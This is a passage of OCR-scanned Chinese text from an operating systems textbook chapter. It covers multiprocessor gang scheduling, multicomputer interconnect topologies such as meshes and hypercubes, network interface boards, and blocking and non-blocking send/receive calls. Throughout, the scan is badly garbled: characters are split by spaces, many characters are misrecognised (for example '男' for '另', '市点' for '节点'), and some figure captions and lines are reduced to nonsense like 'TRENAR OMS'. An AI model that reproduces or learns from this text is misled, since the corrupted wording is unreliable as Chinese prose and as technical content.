8 和 12 个 CPU， 有 两 个 CPU 没有 分 配 。 随 着 时 间 的 流逝 ， 新 的 线程 创 
建 ， 旧 的 线程 终止 ，CPU 分 区 大 小 和 数量 都 会 发 生变 化 。 
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未 分 配 moa” 12 个 CPU 的 分 区 
图 8-13 一 个 32 个 CPU 的 集合 被 分 成 4 个 分 区 ， 两 个 CPU 可 用 


必须 进行 周期 性 的 调度 决策 。 在 单 处 理 机 系统 中 ， 最 短 作业 优先 
是 批 处 理 调度 中 知名 的 算法 。 在 多 处 理 机 系统 中 类 似 的 算法 是 ， 选 择 
需要 最 少 的 CPU 周 期 数 的 线程 ， 也 就 是 其 CPU 周 期 数 x 运 行 时 间 最 小 的 
线程 为 候选 线程 。 然 而 ， 在 实际 中 ， 这 一 信息 很 难得 到 ， 因 此 该 算法 
难以 实现 。 事 实 上 ， 研 究 表 明 ， 要 胜 过 先 来 先 服务 算法 是 非常 困难 的 
(Krueger 等 人 ，1994) ° 


在 这 个 简单 的 分 区 模型 中 ， 一 个 线程 请 求 一 定数 量 的 CPU， 然 后 
或 者 全 部 得 到 它们 或 者 一 直 等 到 有 足够 数量 的 CPU 可 用 为 止 。 另 一 种 
处 理 方 式 是 主动 地 管理 线程 的 并 行 度 。 管 理 并 行 度 的 一 种 途径 是 使 用 
一 个 中 心服 务 器 ， 用 它 跟踪 哪些 线程 正在 运行 ， 哪 些 线程 希望 运行 以 
及 所 需 CPU 的 最 小 和 最 大 数量 (Tucker 和 Gupta，1989) 。 每 个 应 用 程 
序 周期 性 地 询问 中 心服 务 器 有 多 少 个 CPU 可 用 。 人 然后 它 调 整 线程 的 数 


量 以 符合 可 用 的 数量 。 例 如 ， 一 台 Web 服 务 器 可 以 5、10、20 或 任何 其 
他 数量 的 线程 并 行 运行 。 如 果 它 当前 有 10 个 线程 ， 突 然 ， 系 统 对 CPU 
的 需求 增加 了 ， 于 是 它 被 通知 可 用 的 CPU 数 量 减 到 了 5 个 ， 那 么 在 接 下 
来 的 5 个 线程 完成 其 当前 工作 之 后 ， 它 们 就 被 通知 退出 而 不 是 给 予 新 的 
工作 。 这 种 机 制 允 许 分 区 大 小 动态 地 变化 ， 以 便 与 当前 负载 相 匹配 ， 
这 种 方法 优 于 图 8-13 中 的 固定 系统 。 


3. 群 调度 (Gang Scheduling) 


空间 共享 的 一 个 明显 优点 是 消除 了 多 道 程序 设计 ， 从 而 消除 了 上 
下 文 切 换 的 开销 。 但 是 ， 一 个 同样 明显 的 缺点 是 当 CPU 被 阻塞 或 根本 
无 事 可 做 时 时 间 被 浪费 了 ， 只 有 等 到 其 再 次 就 绕 。 于 是 ， 人 们 寻找 既 
可 以 调度 时 间 又 可 以 调度 空间 的 算法 ， 特 别 是 对 于 要 创建 多 个 线程 而 
这 些 线程 通常 需 要 彼此 通信 的 线程 。 


为 了 考察 一 个 进程 的 多 个 线程 被 独立 调度 时 会 出 现 的 问题 ， 设 想 
一 个 系统 中 有 线程 Ao 和 Ai; 属于 进程 A， 而 线程 Bg 和 Bi 属于 进程 B。 线 
程 Ao 和 Bo 在 CPU 0 上 分 时 ;而 线程 Al 和 Bi 在 CPU 1 上 分 时 。 线 程 Au 
和 Ai 需要 经 常 通信 。 其 通信 模式 是 ，Au 送 给 Al 一 个 消息 ， 然 后 Ai; 回 
送 给 Au 一 个 应 答 ， 紧 跟 的 是 男 一 个 这 样 的 序列 。 假 设 正 好 是 Ao 和 Bl 
首先 开始 ， 如 图 8-14 所 示 。 


线程 A 运行 


图 8-14 进程 A 的 两 个 异步 运行 的 线程 间 的 通信 


在 时 间 片 0，Au 发 给 Ai 一 个 请 求 ， 但 是 直到 Ai 在 开始 于 100ms 的 
时 间 片 1 中 开始 运行 时 它 才 得 到 该 消息 。 它 立即 发 送 一 个 应 答 ， 但 是 直 
到 Au 在 200ms 再 次 运行 时 它 才 得 到 该 应 答 。 最 终结 果 是 每 200ms 一 个 请 
求 -应 答 序列 。 这 个 结果 并 不 好 。 


这 一 问题 的 解决 方案 是 群 调度 (gang scheduling) ， 它 是 协同 调度 
(co-scheduling) (Outsterhout, 1982) 的 发 展 产物 。 群 调度 由 三 个 间 
分 组 成 : 


1) 把 一 组 相关 线程 作为 一 个 单位 ， 即 一 个 群 (gang) ， 一 起 调度 。 
2) 一 个 群 中 的 所 有 成 员 在 不 同 的 分 时 CPU 上 同时 运行 。 


3) 群 中 的 所 有 成 员 共 同 开始 和 结束 其 时 间 片 。 


使 群 调度 正确 工作 的 关键 是 ， 同 步调 度 所 有 的 CPU“。 这 意味 着 把 
时 间 划 分 为 离散 的 时 间 片 ， 如 图 8-14 中 所 示 。 在 每 一 个 新 的 时 间 片 开始 
时 ， 所 有 的 CPU 都 重新 调度 ， 在 每 个 CPU 上 都 开始 一 个 新 的 线程 。 在 
后 续 的 时 间 片 开始 时 ， 另 一 个 调度 事件 发 生 。 在 这 之 间 ， 没 有 调度 行 
为 。 如 果 某 个 线程 被 阻塞 ， 它 的 CPU 保持 空头， 直到 对 应 的 时 间 片 结 
RAIE- 


有 关 群 调度 是 如 何 工作 的 例子 在 图 8-15 中 给 出 。 图 8-15 中 有 一 台 带 
6 个 CPU 的 多 处 理 机 ， 由 5 个 进程 A 到 E 使 用 ， 总 共有 24 个 就 绪 线 程 。 在 
taf (time slot) 0， 线 程 Ao Ag 被 调度 运行 。 在 时 间 槽 1， 调 度 线 
FEB Bi ` By > Cy ` Ci MIC, 被 调度 运行 。 在 时 间 模 2， 进程 D 的 5 个 
线程 以 及 E 运行 。 剩 下 的 6 个 线程 属于 E， 在 时 间 槽 3 中 运行 。 然 后 周期 
重复 进行 ， 时 间 权 4 与 时 间 槽 0 一样， 以 此 类 推 。 
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图 8-15 和 群 调度 


群 调度 的 思想 是 ， 让 一 个 进程 的 所 有 线程 一 起 运行 ， 这 样 ， 如 果 
其 中 一 个 线程 向 男 一 个 线程 发 送 请 求 ， 接 受 方 几乎 会 立即 得 到 消息 ， 
并 且 几 乎 能 够 立即 应 答 。 在 图 8-15 中 ， 由 于 进程 的 所 有 线程 在 同一 个 时 
间 厂 内 一 起 运行 ， 它 们 可 以 在 一 个 时 间 片 内 发 送 和 接受 大 量 的 消 忆 ， 
从 而 消除 了 图 8-14 中 的 问题 。 


8.2 ”多 计算 机 


多 处 理 机 流行 和 有 吸引 力 的 原因 是 ， 它 们 提供 了 一 个 简单 的 通信 
模型 : 所 有 CPU 共 享 一 个 公用 存储 器 。 进 程 可 以 疝 存储 器 写 消息 ， 然 
后 被 其 他 进程 读 取 。 可 以 使 用 互 斥 信号 量 、 信 和 号 量 、 管 程 (monitor) 
和 其 他 适合 的 技术 实现 同步 。 惟 一 美中不足 的 是 ， 大 型 多 处 理 机 构造 
困难 ， 因 而 造价 高 昂 。 


为 了 解决 这 个 问题 ， 人 们 在 多 计算 机 (multicomputers) 领域 中 进 
行 了 很 多 研究 。 多 计算 机 是 紧 耦 合 CPU， 不 共享 存储 器 。 每 台 计 算 机 
有 目 己 的 存储 龙 ， 如 图 8-1b 所 示 。 人 众所周知， 这些 系 统 有 各 种 其 他 的 名 
称 ， 如 机 群 计算 机 (cluster computers) 以 及 工作 站 机 群 (Clusters of 
Workstations，COWS) 。 


多 计算 机 容易 构造 ， 因 为 其 基本 部 件 只 是 一 台 配 有 高 性 能 网 络 接 
口 卡 的 PC 裸 机 。 当 然 ， 获 得 高 性 能 的 秘密 是 巧妙 地 设计 互连网 络 以 及 
接口 卡 。 这 个 问题 与 在 一 台 多 处 理 机 中 构造 共享 存储 器 是 完全 类 似 
的 。 但 是 ， 由 于 目标 是 在 微 秒 (microsecond) 数量 级 上 发 送 消 息 ， 而 
不 是 在 纳 秒 (nanosecond) 数量 级 上 访问 存储 器 ， 所 以 这 是 一 个 相对 简 
单 、 便 宜 且 容易 实现 的 任务 。 


在 下 面 儿 节 中 ， 我 们 将 首先 简要 地 介绍 多 计算 机 硬件 ， 特 别 是 互 
连 人 硬件 。 然 后 ， 我 们 将 讨论 软件 ， 从 低层 通信 软件 开始 ， 接 着 是 高 层 
通信 软件 。 我 们 还 将 讨论 在 没有 共享 存储 器 的 系统 中 实现 共享 存储 天 
的 方法 。 最 后 ， 我 们 将 讨论 调度 和 负载 平衡 的 问题 。 


8.2.1 多 计算 机 硬件 


一 人 台 多 计算 机 的 基本 节点 包括 一 个 CPU、 存储 郁 、 一 个 网 络 接 
口 ， 有 时 还 有 一 个 硬盘 。 攻 点 可 以 封 竣 在 标准 的 PC 机 箱 中 ， 不 过 通 币 
没有 网 像 适 配 卡 、 显 示 郁 、 键 盘 和 鼠标 等 。 在 某 些 情况 下 ，PC 机 中 有 
一 块 2 通道 或 4 通道 的 多 处 理 机 主板 ， 可 能 之 有 双核 或 者 四 核心 片 而 不 
定单 个 CPU， 不 过 为 了 简化 问题 ， 我 们 假设 每 个 下 点 有 一 个 CPU。 通 
常 成 百 个 甚至 上 干 个 节 扩 连接 在 一 起 组 成 一 个 多 计算 机 。 下 面 我 们 将 
介绍 一 些 关 于 硬件 如 何 组 织 的 内 容 。 


1. 互 连 技术 


在 每 个 点 上 有 一 块 网 卡 ， 带 有 一 根 或 两 根 从 网 卡 上 接 出 的 电 顷 
(或 光纤 ) 。 这 些 电 缆 或 者 连 到 其 他 的 节点 上 ， 或 者 连 到 交换 机 上 。 
在 小 型 系统 中 ， 可 能 会 有 一 个 按照 图 8-16a 的 星 型 拓扑 结构 连接 所 有 市 
点 的 的 交换 机 。 现 代 交 换 型 以 太 网 吏 采 用 了 这 种 拓扑 结构 。 
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根 线 从 网 络 接口 卡 上 出 来 ， 一 根 去 连接 元 面 的 万 点 ， 邦 一 根 去 连接 右 
面 的 节点 ， 如 图 8-16b 所 示 。 在 这 种 拓扑 结构 中 不 需要 交换 机 ， 所 以 图 
中 也 没有 。 


图 8-16c 中 的 网 格 (grid 或 mesh) 是 一 种 在 许多 商业 系统 中 应 用 的 
二 维 设计 。 它 相当 规整 ， 而 且 容 易 扩展 为 大 规模 系统 。 这 种 系统 有 一 
个 直径 (diameter) ， 即 在 任意 两 个 节点 之 间 的 最 长 路 径 ， 并 且 该 值 只 
按照 节点 数目 的 平方 根 增加 。 网 格 的 变种 是 双 凸 面 (double torus) ， 
如 岁 8-16d 所 示 ， 这 有 是 一 种 边 连 通 的 网 烙 。 这 种 拓扑 结构 不 仅 较 网 格 具 
有 更 强 的 容错 能 力 而 且 其 直径 也 比较 小 ， 因 为 对 角 之 间 的 通信 只 需要 
两 跳 。 


图 8-16e 中 的 立方 体 (cube) 是 一 种 规则 的 三 维 拓扑 结构 。 我 们 展 
示 的 是 2x2x2 立 方 体 ， 更 一 般 的 情形 则 是 kxkxk 立 方 体 。 在 图 8-16f 中 ， 
征 一 种 用 两 个 三 维 立方 体 加 上 对 应 边 连 接 所 组 成 四 维 立 方 体 。 我 们 可 
以 仿照 图 8-16{ 的 结构 并 且 连 接 对 应 的 节点 以 组 成 四 个 立方 体 组 块 来 制 
作 五 维 立方 体 。 为 了 实现 六 维 ， 可 以 复制 四 个 立方 体 的 块 并 把 对 应 市 
扩 互 连 起 来 ， 以 此 类 推 。 以 这 种 形式 组 成 的 n 维 立方 体 称 为 超 立 方 体 
(hypercube) 。 许 多 并 行 计算 机 采用 这 种 拓扑 结构 ， 因 为 其 直径 随 着 
维 数 的 增加 线性 增长 。 换 句 话 说， 直径 是 节点 数 的 目 然 对 数 ， 例 如 ， 
一 个 10 维 的 超 立 方 体 有 1024 个 节点 ， 但 是 其 直径 仅 为 10， 有 着 出 色 的 


延迟 特性 。 注 意 ， 与 之 相反 的 是 ，1024 的 节点 如 果 按照 32x32 网 格 布局 
则 其 直径 为 62， 较 超 立方 体 相差 了 六 倍 多 。 对 于 超 立 方 体 而 言 ， 获 得 
较 小 直径 的 代价 是 肩 出 数量 (fanout) 以 及 由 此 而 来 的 连接 数量 (及 成 
本 ) 的 大 量 增加 。 


d) e) f) 


图 8-16 各 种 互 连 拓 扑 结构 :a) 单 交换 机 ; DEA; OMB; AMG 
H: DAW; 了) 四 维 超 立 方 体 


在 多 计算 机 中 可 采用 两 种 交换 机 制 。 在 第 一 种 机 制 里 ， 每 个 消 忆 
首先 被 分 解 (由 用 户 软 件 或 网 络 接口 进行 ) 成 为 有 最 大 长 度 限 制 的 
ER, MA (packet) 。 该 交换 机 制 称 为 存储 转发 包 交 换 (store-and- 


forward packet switching) ， 由 源 节 点 的 网 络 接口 卡 注入 到 第 一 个 交换 
机 的 包 组 成 ， 如 图 8-17a 所 示 。 比特 串 一 次 进来 一 位 ， 当 整个 包 到 达 一 
个 输入 缓冲 区 时 ， 它 被 复制 到 沿 着 其 路 径 通 向 下 一 个 交换 机 的 队列 当 
中 ， 如 图 8-17b 所 示 。 当 包 到 达 目 标 市 点 所 连接 的 交换 机 时 ， 如 图 8-17c 
所 示 ， 该 包 人 被 复制 进入 目标 市 点 的 网 络 接 口 卡 ， 并 最 终 到 达 其 RAM 。 


输入 端口 
输出 端口 
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Kl 8-17 存储 转发 包 交 换 


尽管 存储 转发 包 交 换 灵 活 且 有 效 ， 但 是 它 存在 通过 互连网 络 时 增 
加 时 延 (HEIR) 的 问题 。 假 设 在 图 8-17 中 把 一 个 包 传 送 一 跳 所 花费 的 时 
间 为 T 纳 秒 。 为 了 从 CPU 1 到 CPU 2， 该 包 必 须 被 复制 四 次 (至 A、 至 
C、 至 D 以 及 到 目标 CPU) ， 而 且 在 前 一 个 包 完 成 之 前 ， 不 能 开始 有 关 
的 复制 ， 所 以 通过 该 互连网 络 的 时 延 是 4T。 一 条 出 路 是 设计 一 个 网 
络 ， 其 中 的 包 可 以 逻辑 地 划分 为 更 小 的 单元 。 只 要 第 一 个 单元 到 达 一 


PACA, ERB ACE RTCA, EBA) Ae 2 RRAZ 
前 进行 。 可 以 想象 ， 这 个 传送 单元 可 以 小 到 1 比特 。 


另 一 种 交换 机 制 是 电路 交换 (circuit switching) ， 它 包括 由 第 一 个 
交换 机 建立 的 ， 通 过 所 有 交换 机 而 到 达 目 标 交换 机 的 一 条 路 径 。 一 旦 
该 路 径 建 立 起 来 ， 比 特 流 就 从 源 到 目的 地 通过 整个 路 径 不 断 地 尽快 输 
送 。 在 所 涉及 的 交换 机 中 ， 没 有 中 间 缓 冲 。 电 路 交换 需要 有 一 个 建立 
阶段 ， 它 需要 一 点 时 间 ， 但 是 一 旦 建立 完成 ， 速 度 束 很 快 。 在 包 发 送 
完毕 之 后 ， 该 路 径 必 须 被 拆除 。 电 路 交换 的 一 种 变种 称 为 虫 孔 路 由 
(wormhole routing) ， 它 把 每 个 包 拆 成 子 包 ， 并 人 允许 第 一 个 子 包 在 整 
个 路 径 还 没有 完全 建立 之 前 就 开始 流动 。 


2. 网 络 接口 


在 多 计算 机 中 ， 所 有 节点 里 都 有 一 块 插 卡 板 ， 它 包含 市 点 与 互 连 
网 络 的 连接 ， 这 使 得 多 计算 机 连 成 一 体 。 这 些 板 的 构造 方式 以 及 它们 
如 何 同 主 CPU 和 RAM 连 接 对 操作 系统 有 重要 影响 。 这 里 简要 地 介绍 一 
些 有 关 的 内 容 。 部 分 内 容 来 源 于 (Bhoedjang, 2000) 。 


事实 上 在 所 有 的 多 计算 机 中 ， 接 口 板 上 都 有 一 些 用 来 存储 进出 包 
的 RAM。 通 单 ， 在 包 被 传送 到 第 一 个 交换 机 之 前 ， 这 个 要 送出 的 包 必 
须 被 复制 到 接口 板 的 RAM 中 。 这 样 设 计 的 原因 是 许多 互连网 络 是 同步 
的 ， 所 以 一 旦 一 个 包 的 传送 开始 ， 比 特 流 必须 以 恒定 的 速率 连续 进 


行 。 如 果 包 在 主 RAM 中 ， 由 于 内 存 总 线 上 有 其 他 的 信息 流 ， 所 以 这 个 
送 到 网 络 上 的 连续 流 是 不 能 保证 的 。 在 接口 板 上 使 用 专门 的 RAM， 怠 
消除 了 这 个 问题 。 这 种 设计 如 图 8-18 所 示 。 
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图 8-18 网 络 接口 卡 在 多 计算 机 中 的 位 置 


同样 的 问题 还 出 现在 接收 进来 的 包 上 “。 从 网 络 上 到 达 的 比特 流速 
率 是 恒定 的 ， 并 且 经 名 有 非常 高 的 速率 。 如 有 果 网 络 接口 卡 不 能 在 它们 
到 达 的 时 候 实时 存储 它们 ， 数 据 将 会 丢失 。 同 样 ， 在 这 里 试图 通过 系 
统 总 线 〈 例 如 PCI 总 线 ) 到 达 主 RAM 是 非常 危险 的 。 由 于 网 卡通 常 插 在 
PCI 总 线 上 ， 这 是 一 个 惟一 的 通 向 主 RAM 的 连接 ， 所 以 不 可 避免 地 要 同 
磁盘 以 及 每 个 其 他 的 MO 设备 竞争 总 线 。 而 把 进来 的 包 首 先 保存 在 接口 
板 的 私有 RAM 中 ， 然 后 再 把 它们 复制 到 主 RAM 中 ， 则 更 安全 些 。 


接口 板 上 可 以 有 一 个 或 多 个 DMA 通 道 ， 甚 至 在 板 上 有 一 个 完整 的 
CPU (乃至 多 个 CPU) 。 通 过 请 求 在 系统 总 线 上 的 块 传送 (block 
transfer) ，DMA 通 道 可 以 在 接口 板 和 主 RAM 之 间 以 非常 高 的 速率 复制 

， 因 而 可 以 一 次 性 传送 看 干 字 而 不 需要 为 每 个 字 分 别 请 求 总 线 。 不 
过 ， 准 确 地 说 ， 正 是 这 种 块 传送 〈 它 占用 了 系统 总 线 的 多 个 总 线 周 
期 ) 使 接口 板 上 的 RAM 的 需要 是 第 一 位 的 。 


很 多 接口 板 上 有 一 个 完整 的 CPU， 可 能 另外 还 有 一 个 或 多 个 DMA 
© 它们 被 称 为 网 络 处 理 器 (network processor) ， 并 且 其 功能 日 趋 
强大 。 这 种 设计 意味 着 主 CPU 将 一 些 工 作 分 给 了 了 网卡， 诸如 处 理 可 靠 
的 传送 (如 果 底 层 的 硬件 会 丢 包 ) > 2H (将 包 发 送 到 多 于 一 个 的 目 
的 地 ) 、 压 缩 / 解 压缩 、 加 密 /解密 以 及 在 多 进程 系统 中 人 处 理 安全 事务 
等 。 但 是 ， 有 两 个 CPU 则 意味 着 它们 必须 同步 ， 以 避免 竞争 条 件 的 发 
， 这 将 增加 额外 的 开销 ， 并 且 对 于 操作 系统 来 说 意味 着 要 承担 更 多 
的 工作 。 


8.2.2 ”低层 通信 软件 


在 多 计算 机 系统 中 高 性 能 通信 的 敌人 是 对 包 的 过 度 复制 。 在 最 好 
的 情形 下 ， 在 源 节 点 会 有 从 RAM 到 接口 板 的 一 次 复制 ， 从 源 接口 板 到 
目的 接口 板 的 一 次 复制 《如果 在 路 径 上 没有 存储 和 转发 发 生 ) 以 及 从 
目的 接口 板 再 到 目的 地 RAM 的 一 次 复制 ， 这 样 一 共有 三 次 复制 。 但 
是 ， 在 许多 系统 中 情况 要 糟糕 得 多 。 特 别 是 ， 如 果 接 口 板 被 映射 到 内 
核 虚 拟 地 址 空间 中 而 不 是 用 户 虚 拟 地 址 空间 的 话 ， 用 户 进程 只 能 通过 
发 出 一 个 陷入 到 内 核 的 系统 调用 的 方式 来 发 送 包 。 内 核 会 同时 在 输入 
和 输出 时 把 包 复 制 到 自己 的 存储 空间 去 ， 从 而 在 传送 到 网 络 上 时 避免 
出 现 缺 页 异常 (page fault) 。 同 样 ， 接 收 包 的 内 核 在 有 机 会 检查 包 之 
前 ， 可 能 也 不 知道 应 该 把 进来 的 包 放 置 到 哪里 。 上 壕 五 个 复制 步 又 如 
图 8-18 所 示 。 


如 果 说 进出 RAM 的 复制 是 性 能 瓶颈 ， 那 么 进出 内 核 的 额外 复制 会 
将 端 到 端的 延 玉 加倍， 并 把 吞吐 量 (throughput) 降低 一 半 。 为 了 避免 
这 种 对 性 能 的 影响 ， 不 少 多 计算 机 把 接口 板 映射 到 用 尸 空 间 ， 并 人 允许 
用 户 进 程 直 接 把 包 送 到 卡 上 ， 而 不 需要 内 核 的 参与 。 尺 管 这 种 处 理 确 
实 改善 了 性 能 ， 但 却 带 来 了 两 个 问题 。 
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包 ， 该 怎么 办 ? 哪 一 个 进程 应 该 在 其 地 址 至 间 中 获得 接口 板 呢 ? BRT 
拥有 一 个 系统 调用 将 接口 板 映 味 进 出 一 个 虚拟 地 址 空间 ， 其 代价 是 很 
高 的 ， 但 是 ， 如 琳 只 有 一 个 进程 获得 了 卡 ， 那 么 其 他 进程 该 如 何 发 送 
包 呢 ? 如 果 网 卡 被 映射 进 了 进程 A 的 虚拟 地 址 空间 ， 而 所 到 达 的 包 却 
征 进 程 B 的 ， 又 该 垮 么 办 ?尤其 是 ， 如 采 A 和 B 属 于 不 同 的 所 有 者 ， 其 中 
任何 一 方 都 不 打算 协助 另 一 方 ， 又 怎么 办 ? 


一 个 解决 方案 是 ， 把 接口 极 映射 到 所 有 需要 它 的 进程 中 去 ， 但 坪 
这 样 做 瑟 需 要 有 一 个 机 制 用 以 避免 东 争 。 例 如 ， 如 果 A 申 明 接 口 板 上 
的 一 个 缓冲 区 ， 而 由 于 时 间 片 ，B 开 始 运 行 并 且 申 明 同 一 个 缓冲 区 ， 
那么 就 会 发 生 灾难 。 需 要 有 有 茶 种 同步 机 制 ， 但 是 那些 诸如 互 斤 信号 量 
(mutex) 一 类 的 机 制 需要 在 进程 会 彼此 协作 的 前 提 下 才能 工作 。 在 有 
多 个 用 户 的 分 时 环境 下 ， 所 有 的 用 户 都 和 希望 其 工作 尽快 完成 ， 某 个 用 
尸 也 许 会 锁 住 与 接口 板 有 关 的 互 不 信号 量 而 不 肯 释 放 。 从 这 里 得 到 的 
结论 是 ， 对 于 将 接口 板 映 射 到 用 户 空 间 的 方案 ， 只 有 在 每 个 节点 上 只 
有 一 个 用 户 进 程 运行 时 才能 够 发 挥 作用 ， 否 则 必须 设置 专门 的 预防 机 
制 〈 例 如 ， 对 不 同 的 进程 可 以 把 搂 口 板 上 RAM 的 不 同 部 分 映射 到 各 自 
的 地 址 空间 ) 。 


第 二 个 问题 是 ， 内 核 本 里 会 经 常 需 要 访问 互连网 络 ， 例 如 ， 访 问 
远程 节点 上 的 文件 系统 。 如 果 考 虑 让 内 核 与 任何 用 户 共享 同一 块 接口 


板 ， 即 便 是 基于 分 时 方式 ， 也 不 是 一 个 好 主意 。 假 设 当 板 被 映射 到 用 
户 空 间 ， 收 到 了 一 个 内 核 的 包 ， 那 么 垮 么 办 ? 或 者 有 某 个 用 户 进 程 回 
一 个 伪装 成 内 核 的 远程 机 融 发 送 了 一 个 包 ， 又 该 怎么 办 ? 结论 是 ， 基 
简单 的 设计 十 使 用 两 块 网 络 接口 板 ， 一 块 映 射 到 用 户 空间 供应 用 程序 
使 用 ， 男 一 块 映射 到 内 核 空间 供 操作 系统 使 用 。 许 多 多 计算 机 束 正 是 
这 样 做 的 。 


TRENAR OMS 


下 一 个 问题 是 如 何 将 包 送 到 接口 板 上 。 最 快 的 方法 是 使 用 板 上 的 
DMA 心 片 直接 将 它们 从 RAM 复 制 到 板 上 。 这 种 方式 的 问题 是 ，DMA 
使 用 物理 地 址 而 不 是 虚拟 地 址 ， 并 且 独 立 于 CPU 运行 。 首 先 ， 尽 管 一 
个 用 户 进程 肯定 知道 它 打 算 发 送 的 任何 包 所 在 的 虚拟 地 址 ， 但 它 通 常 
不 知道 有 关 的 物理 地 址 。 设 计 一 个 系统 调用 进行 虚拟 地 址 到 物理 地 址 
的 映射 是 不 可 取 的 ， 因 为 把 接口 板 放 到 用 户 空间 的 首要 原因 就 是 为 了 
避免 不 得 不 为 每 个 要 发 送 的 包 进 行 一 次 系统 调用 。 


另外 ， 如 林 操 作 系统 决定 蔡 换 一 个 页 面 ， 而 DMA 心 片 正在 从 该 页 
面 复制 一 个 包 ， 就 会 传送 错误 的 数据 。 然 而 更 加 糟 料 的 是 ， 如 采 操 作 
系统 在 替换 某 一 个 页 面 的 同时 DMA 忌 片 正在 把 一 个 包 复制 进 该 页 面 ， 
结果 不 仅 进 来 的 包 会 丢失 ， 无 率 的 存储 紫 页 面 也 会 补 毁 十 。 


为 了 以 避免 上 述 癌 题 ， 可 采用 一 类 将 页 面 钉 住 和 释放 的 系统 调 
用 ， 把 有 关 页 面 标记 成 暂时 不 可 交换 的 。 但 是 不 仅 需 要 有 一 个 系统 调 
用 钉 住 含有 每 个 输出 包 的 页 面 ， 还 要 有 为 一 个 系统 调用 进行 释放 工 
作 ， 这 样 做 的 代价 太 大 。 如 采 包 很 小 ， 比 如 64 字 节 或 更 小 ， 束 不 能 肪 
受 钉 住 和 释放 每 个 缓冲 区 的 开销 。 对 于 大 的 包 ， 比 如 说 1KB 或 更 大 ， 
也 许 会 容 恕 相关 开销 。 对 于 大 小 在 这 两 者 之 间 的 包 ， 束 要 取决 于 硬件 
的 具体 情况 了 。 除 了 会 对 性 能 市 来 影响 ， 钉 住 和 释放 页 面 将 会 增加 软 
件 的 复杂 性 。 


8.23 ”用 户 层 通信 软件 


在 最 简单 的 情况 下 ， 这 种 消 轧 传送 是 又 露 给 用 户 进程 的 。 换 句 话 说 ， 
操作 系统 提供 了 一 种 发 送 和 接收 消息 的 途径 ， 而 库 过 程 使 得 这 些 低层 
的 调用 对 用 户 进程 可 用 。 在 较 复杂 的 情形 下 ， 通 过 使 得 远程 通信 看 起 
来 像 过 程 调用 的 办 法 ， 将 实际 的 消 恩 传递 对 用 户 隐藏 起 来 。 下 面 将 讨 
论 这 两 种 方法 。 


在 多 计算 机 中 ， 不 同 CPU 上 的 进程 通过 互相 发 送 消 恩 实 现 通 信 。 
a 


1. 发 送 和 接收 


在 最 简化 的 的 情形 下 ， 所 提供 的 通信 服务 可 以 减少 到 两 个 ( 库 ) 
调用 ， 一 个 用 于 发 送 消 忌 ， 为 一 个 用 于 接收 消 恩 。 发 送 一 条 消 忌 的 调 


用 可 能 是 


send(dest, &mptr); 
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receive(addr, &mptr); 
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并 且 引 起 对 调用 者 的 阻塞 ， 直 到 该 消 轧 被 发 出 。 后 者 引起 对 调用 者 的 
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缓冲 区 ， 并 且 撤 销 对 调用 者 的 阻塞 。addr 参 数 指定 了 接收 者 要 监听 的 地 
址 。 这 两 个 过 程 及 其 参数 有 许多 可 能 的 变种 。 


一 个 问题 是 如 何 编 址 。 由 于 多 计算 机 是 静态 的 ，CPU 数 目 是 固定 
的 ， 所 以 处 理 编 址 问题 的 最 便利 的 办 法 是 使 addr 由 两 部 分 的 地 址 组 成 ， 
其 中 一 部 分 是 CPU 编 号 ， 男 一 部 分 古 在 这 个 已 编 址 的 CPU 上 的 一 个 进 
程 或 端口 的 编号 。 在 这 种 方式 中 ， 每 个 CPU 可 以 管理 目 己 的 地 址 而 不 
会 有 潜在 的 冲突 。 


2. 阻 塞 调用 和 非 阻 塞 调 用 


上 面 所 叙述 的 调用 是 阻塞 调用 (有 了 时 称 为 同步 调用 ) 。 当 一 个 进 
程 调用 send 时 ， 它 指定 一 个 目标 以 及 用 以 发 送 消 恩 到 该 目标 的 一 个 缓 促 
区 。 当 消息 发 送 时 ， 发 送 进程 被 阻塞 ( 挂 起 ) 。 在 消息 已 经 完全 发 送 
出 去 之 前 ， 不 会 执行 跟随 在 调用 send 后 面 的 指令 ， 如 图 8-19a 所 示 。 类 
似 地 ， 在 消 筷 真正 接收 并 且 放 入 由 参数 指定 的 消 已 缓冲 区 之 前 ， 对 
receive 的 调用 也 不 会 把 控制 返回 。 在 receive 中 进程 傈 持 挂 起 状态 ， 直 到 
消息 到 达 为 止 ， 这 甚至 有 可 能 等 竺 若干 小 时 。 在 有 些 系统 中 ， 接 收 者 
可 以 指定 希望 从 谁 处 接收 消 思 ， 在 这 种 情况 下 接收 者 束 保 持 阻 塞 状 
仿 ， 直 到 来 目 那 个 发 送 者 的 消 忆 a 到达 为 止 。 


发 送 者 运行 “|< 一 一 一 一 发送 者 被 阻塞 一 一 一 一 | ”发 送 者 运行 
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发 送 者 被 阻塞 从 内 核 返 回 ， 
ee niii 发 送 者 被 释放 

-一 一 一 消息 正在 被 发 送 — 
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b) 


Al 8-19 a) 一 个 阻塞 的 send 调 用 ; b) 一 个 非 阴 塞 的 send 调 用 


相对 于 阻塞 调用 的 另 一 种 方式 是 非 阻 塞 调用 (有 了 时 称 为 异步 调 
H) 。 如 果 send 是 非 阻 塞 的 ， 在 消息 发 出 之 前 ， 它 立即 将 控制 返回 给 调 
用 者 。 这 种 机 制 的 优点 十 发 送 进 程 可 以 继续 运算 ,与 消息 传送 并 行 ， 
而 不 是 让 CPU 空 间 (假设 没有 其 他 可 运行 的 进程 。 通 常 是 由 系统 设 
计 者 做 出 在 阻塞 原 语 和 非 阻 塞 原 语 之 间 的 选择 (或 者 使 用 这 种 原 语 或 
者 男 一 种 原 语 ) ， 当 然 也 有 人 少数 系统 中 两 种 原 语 同时 可 用 ， 而 让 用 户 
决定 其 喜好 。 


但 是 ， 非 阻塞 原 语 所 提供 的 性 能 优点 被 其 严重 的 缺点 所 抵消 了 : 
直到 消 妃 被 送出 发 送 考 才能 修改 请 县 缓冲 区 。 进 程 在 传输 过 程 中 重 写 
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知道 传输 何 时 会 结束 ， 所 以 根本 不 知道 什么 时 候 重 用 缓冲 区 是 安全 
的 。 不 可 能 永远 避免 再 碰 缓 冲 区 。 


有 三 种 可 能 的 解决 方案 。 第 一 种 方案 是 ， 让 和 内核 复制 这 个 消 轧 到 
内 部 的 内 核 缓冲 区 ， 然 后 让 进程 继续 ， 如 图 8-19b 所 示 。 从 发 送 者 的 观 
点 来 看 ， 这 个 机 制 与 阻塞 调用 相同 : 只 要 进程 获得 控制 ， 就 可 以 随意 
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硬件 的 传输 缓冲 区 中 ， 所 以 第 一 次 的 复制 实质 上 是 浪费 。 额 外 的 复制 
会 明显 地 降低 系统 的 性 能 。 


第 二 种 方案 是 ， 当 消息 发 送 之 后 中 断 发 送 者 ， 告 知 缓冲 区 又 可 以 
